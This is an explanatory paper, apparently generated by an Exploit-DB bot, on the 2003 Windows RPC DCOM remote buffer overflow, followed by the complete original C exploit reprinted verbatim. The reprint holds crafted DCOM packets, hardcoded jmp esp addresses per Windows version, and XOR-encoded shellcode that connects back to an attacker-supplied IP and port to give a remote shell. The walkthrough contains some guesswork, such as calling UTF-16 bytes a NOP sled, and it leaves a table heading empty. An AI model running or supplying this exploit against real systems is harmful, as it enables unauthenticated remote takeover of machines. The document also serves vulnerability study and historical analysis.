Understanding the Microsoft Windows RPC DCOM Remote Buffer Overflow Exploit (2003)

What this paper is

This paper details a remote buffer overflow vulnerability in Microsoft's Distributed Component Object Model (DCOM) Remote Procedure Call (RPC) service. The exploit allows an attacker to remotely execute arbitrary code on a vulnerable Windows system without any prior authentication. The exploit code provided is a C program designed to leverage this vulnerability.

Simple technical breakdown

The vulnerability lies in how the DCOM RPC service handles certain network requests. Specifically, it fails to properly validate the size of data being processed in a buffer. When a specially crafted, oversized request is sent, it can overwrite adjacent memory, including crucial control data like return addresses. This overwrite allows the attacker to redirect the program's execution flow to their own malicious code (shellcode) that has been injected into the system's memory.

The exploit works by:

Establishing a connection: It connects to the target machine on the DCOM RPC port (typically 135).
Sending initial data: It sends a series of carefully constructed network packets (bindstr, request1, request2). These packets are designed to set up the vulnerable state within the DCOM RPC service.
Injecting the payload: The core of the exploit is the sc (shellcode) buffer. This buffer contains the attacker's malicious code, along with padding and a "jump to ESP" (Extended Stack Pointer) instruction. The "jump to ESP" instruction is critical because it tells the vulnerable program to execute the code located at the current stack pointer, which is where the shellcode is placed.
Triggering the overflow: The exploit sends request3 and request4 which contain the overflow data. This data is designed to be larger than expected, overwriting memory and redirecting execution to the shellcode.
Executing shellcode: Once the execution flow is redirected, the injected shellcode runs, potentially giving the attacker control over the compromised system.

Complete code and payload walkthrough

Let's break down the C code and the data structures.

Includes and Pragmas:

#include <stdio.h>: Standard input/output functions.
#include <winsock2.h>: Windows Sockets API for network communication.
#include <windows.h>: Core Windows API functions.
#include <process.h>: Process control functions (though not heavily used here).
#include <string.h>: String manipulation functions.
#include <winbase.h>: Base Windows API functions.
#pragma comment(lib,"ws2_32"): Links the Winsock 2.0 library.

Data Buffers:

unsigned char bindstr[]: This array contains bytes representing a DCOM bind request. It's likely used to establish a connection and negotiate communication parameters with the DCOM RPC service. The specific structure and values are part of the DCOM protocol for initiating a connection.
unsigned char request1[]: This is a larger data buffer containing a complex sequence of bytes. It's part of the initial communication to the DCOM RPC service. It likely contains RPC interface identifiers, operation codes, and other metadata required for DCOM communication. The structure is highly specific to the DCOM protocol.
unsigned char request2[]: This buffer appears to be a template or part of the request that is modified before sending. It contains values that are later adjusted based on the size of the shellcode. The initial bytes 0x20,0x00,0x00,0x00 suggest a length field, and 0x5C,0x00,0x5C,0x00 might be related to path or string data.
unsigned char request3[]: This buffer contains what looks like a UNC path (\\C$\...\\doc\0). The 0x5C,0x00 represents a backslash (\) encoded in UTF-16, and 0x43,0x00 is 'C', 0x24,0x00 is '$', and so on. This might be used to trigger a specific path handling mechanism within the vulnerable service.
unsigned char request4[]: This buffer contains more DCOM-related data, including 0xCC bytes, which are often used as breakpoints or placeholders for overwritten data. The structure suggests it's part of the final payload delivery.

Jump Addresses:

unsigned int jmpesp_cn_sp3 = "\x29\x2c\xe2\x77";
unsigned int jmpesp_cn_sp4 = "\x29\x4c\xdf\x77";
unsigned int jmpesp_en_xp_sp1="\xdb\x37\xd7\x77";
These are hardcoded memory addresses. They represent the address of a jmp esp instruction for different Windows versions and Service Pack levels. The jmp esp instruction is a common technique in buffer overflow exploits. When the program's execution flow is hijacked, it jumps to the stack pointer (esp), which is expected to be pointing to the attacker's shellcode. The specific addresses vary because memory layouts and loaded modules differ between Windows versions.

Shellcode (sc):

unsigned char sc[]= ...: This is the main payload. It's a complex sequence of bytes that includes:
- NOP sled (likely): The initial \x46\x00\x58\x00 sequences and other similar byte patterns are likely NOP (No Operation) instructions. These are used to create a "sled" – a sequence of instructions that do nothing. If the jmp esp lands anywhere within this sled, it will slide down to the actual shellcode.
- jmp esp address: "\x29\x4c\xdf\x77" (or one of the other jmpesp_ addresses, depending on the target OS/SP). This is the instruction that redirects execution.
- Writable address placeholder: "\x38\x6e\x16\x76\x0d\x6e\x16\x76" - These bytes are likely placeholders for an address within the target process that the shellcode can write to. This is often used for self-modification or to store intermediate values.
- Actual Shellcode: The bulk of the sc array contains the actual executable code. This shellcode is designed to perform actions on the compromised system, such as opening a reverse shell, downloading and executing another payload, or creating a backdoor. The bytes are heavily obfuscated and likely use techniques to avoid detection and handle null bytes.
- Padding: The trailing \x90 bytes are NOP instructions used to pad the shellcode to a specific length requirement (e.g., sizeof(shellcode)%16=12). This is a common requirement for certain exploit techniques or shellcode loaders.

Main Function (main):

Variable Declarations: Declares variables for Winsock initialization, sockets, addresses, buffers, etc.
Print Statements: Displays information about the exploit and its authors.
Argument Handling (if(argc<5)): Checks if the correct number of command-line arguments are provided: target IP, local IP, local port, and Service Pack version.
- argv[1]: Target IP address.
- argv[2]: Local IP address (used by the shellcode to connect back).
- argv[3]: Local Port (used by the shellcode to connect back).
- argv[4]: Service Pack version (0 for w2k Chinese SP3, 1 for w2k Chinese SP4, 2 for winxp English SP1). This determines which jmp esp address to use.
jmp esp Address Selection:
- if(atoi(argv[4])==0) memcpy(sc+36,jmpesp_cn_sp3,sizeof(jmpesp_cn_sp3));
- else if (atoi(argv[4])==1) memcpy(sc+36,jmpesp_cn_sp4,sizeof(jmpesp_cn_sp4));
- else if (atoi(argv[4])==2) memcpy(sc+36,jmpesp_en_xp_sp1,sizeof(jmpesp_en_xp_sp1));
  This section dynamically inserts the correct jmp esp address into the sc buffer at a specific offset (36 bytes from the start). This offset is where the exploit expects this instruction to be.
Winsock Initialization (WSAStartup): Initializes the Windows Sockets API.
Socket Creation (socket): Creates a TCP socket.
Connection (WSAConnect): Connects to the target IP address on port 135 (the default DCOM RPC port).
Shellcode Parameter Configuration:
- port1 = htons(atoi(argv[3])); port1 ^= 0x9393;
- cb=inet_addr(argv[2]); cb ^= 0x93939393;
  The local port (argv[3]) and local IP (argv[2]) are XORed with specific magic numbers (0x9393 and 0x93939393). This is a simple form of obfuscation or encoding used by the shellcode to retrieve its configuration.
- *(unsigned short *)&sc[330+0x30] = port1;
- *(unsigned int *)&sc[335+0x30] = cb;
  These lines write the XORed local port and IP address into specific locations within the sc buffer. The offsets 330+0x30 and 335+0x30 are critical and point to where the shellcode expects to find its configuration.
Packet Assembly (memcpy, *(DWORD *)):
- memcpy(buf2,request1,sizeof(request1));
- *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
- *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
  The request2 buffer's length fields are adjusted. The sizeof(sc)/2 suggests that the shellcode is split into two parts, and these lengths are updated to reflect the combined size of request1, request2, and the shellcode.
- memcpy(buf2+len1,sc,sizeof(sc));
- memcpy(buf2+len1,request3,sizeof(request3));
- memcpy(buf2+len1,request4,sizeof(request4));
  The request1, request2, sc, request3, and request4 buffers are concatenated into buf2. This buf2 becomes the final exploit payload sent over the network.
- *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc; (and similar lines)
  Several length fields within the assembled buf2 are adjusted. The -0xc suggests that some parts of the original request structures might be overwritten or that specific offsets are being accounted for to ensure the total packet size is correctly represented.
Sending Data:
- send(sock,bindstr,sizeof(bindstr),0);
  Sends the initial DCOM bind request.
- recv(sock,buf1,1000,NULL);
  Receives a response from the server. This is likely to confirm the bind was successful and to get some initial server state.
- send(sock,buf2,len1,0);
  Sends the main exploit payload (buf2), which contains the overflow and shellcode.
- recv(sock,buf1,1024,NULL);
  Receives the final response, which might indicate success or failure, or could be part of the shellcode's interaction.

Code Fragment/Block -> Practical Purpose Mapping:

| Code Fragment/Block | Practical Purpose

Original Exploit-DB Content (Verbatim)

#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>
#pragma  comment(lib,"ws2_32")

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};




unsigned int jmpesp_cn_sp3 = "\x29\x2c\xe2\x77";
unsigned int jmpesp_cn_sp4 = "\x29\x4c\xdf\x77";
unsigned int jmpesp_en_xp_sp1="\xdb\x37\xd7\x77";


unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    
    "\x29\x4c\xdf\x77"//jmp esp 's address on Windows 2k SP4 Chinese version.
    "\x38\x6e\x16\x76\x0d\x6e\x16\x76"  //should be address which can be written.
        //here is SHELLCODE_¿we can use our SHELLCODE_¿but the length must be sizeof(shellcode)%16=12
,if not please fill with 0x90 
        //SHELLCODE can't has the code such as 0X00 and 0X5C
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\x93\x40\xe2\xfa"
    // code 
    "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
    "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
    "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
    "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
    "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
    "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
    "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
    "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
    "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
    "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
    "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
    "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
    "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
    "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
    "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
    "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
    "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
    "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
    "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

void main(int argc,char ** argv)
{
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned short port1;
    DWORD cb;
    
    printf("RPC DCOM overflow Vulnerability discoveried by LSD\n");
    printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org\n");
    printf("Welcome to our English Site: http://www.xfocus.org\n");
    printf("Welcome to our Chinese Site: http://www.xfocus.net\n");


if(argc<5)
{
  printf("useage:%s targetip localIP LocalPort SPVersion\n",argv[0]);
   printf("SPVersion:\n0 w2k Chinese version +sp3\n 1 w2k Chinese version +SP4\n 2 winxp English
version +sp1\n");
exit(1);
}
 
if(atoi(argv[4])==0)
memcpy(sc+36,jmpesp_cn_sp3,sizeof(jmpesp_cn_sp3));
else if (atoi(argv[4])==1)
memcpy(sc+36,jmpesp_cn_sp4,sizeof(jmpesp_cn_sp4));
else if (atoi(argv[4])==2)
memcpy(sc+36,jmpesp_en_xp_sp1,sizeof(jmpesp_en_xp_sp1));


    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
    
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
    port1 = htons(atoi(argv[3]));  
    port1 ^= 0x9393;
    cb=inet_addr(argv[2]);
    cb ^= 0x93939393;
    *(unsigned short *)&sc[330+0x30] = port1;
    *(unsigned int *)&sc[335+0x30] = cb;
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;  
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;  
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
    
    len=recv(sock,buf1,1000,NULL);
    if (send(sock,buf2,len1,0)==SOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
    len=recv(sock,buf1,1024,NULL);
}

// milw0rm.com [2003-07-25]

By exploitdb papers bot•July 25, 2003•

papers